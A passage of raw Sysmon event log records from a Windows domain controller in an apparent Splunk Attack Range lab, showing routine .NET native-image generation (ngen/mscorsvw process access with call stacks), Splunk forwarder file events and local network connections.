l+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:58.926{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\538-0\Microsoft.WSMan.Management.Activities.dll2021-06-23 21:04:58.926 354300x800000000000000021211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:57.134{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61433-false10.0.1.12-8000- 10341000x800000000000000021210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.567{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.551{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
23542300x800000000000000021247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.923{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F14620E5A8B5051E4AE62BBC36674D2,SHA256=93EA22DC66B1EF8FE507368B244D974139650DEDAA3693875C7B21A09868FD07,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:01.864{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15ac-0\MMCEx.dll2021-06-23 21:05:01.864 23542300x800000000000000021245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:01.645{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=089A549C71C3095B22B888D0B28A415F,SHA256=236BB02CBEA0081D9401624D94E1D371D98EF0CBFF292F67C6F24EB87846D201,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:01.036{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:00.973{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:00.973{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FC-60D3-2C04-00000000CF01}5548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.973{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CEE70B70F4DCA6C830D5033BF6F533D5,SHA256=AAEDC3481EF589BD52D1AA626B900B2157F0130E8A2931BB92DEE2BD915A19F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.958{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-3104-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.942{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-3104-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.942{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-3104-00000000CF01}7128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:05:02.882{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\154c-0\MSBuild.exe2021-06-23 21:05:02.882 23542300x800000000000000021261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.661{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=451A7FFCF5A9A7D89D63577A6D4CF850,SHA256=874C8941B65D07B4428338E354CB50D3CC28D9215E045988FB6FCAEA2FC35B95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.536{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.489{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.489{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-3004-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.286{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-2F04-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.270{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-2F04-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.255{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-2F04-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:02.223{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f68-0\MMCFxCommon.dll2021-06-23 21:05:02.223 10341000x800000000000000021253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.098{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.051{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:02.051{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FE-60D3-2E04-00000000CF01}3944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000021285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:02.263{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61434-false10.0.1.12-8000- 23542300x800000000000000021284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.692{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C109CC1352D7EB0043356C9E9F8655FF,SHA256=1B4FC466D7CDB78AC5CDBDC6D76E024B60B176050B45549F1A1F95832D440C3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.551{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.536{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.536{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3604-00000000CF01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\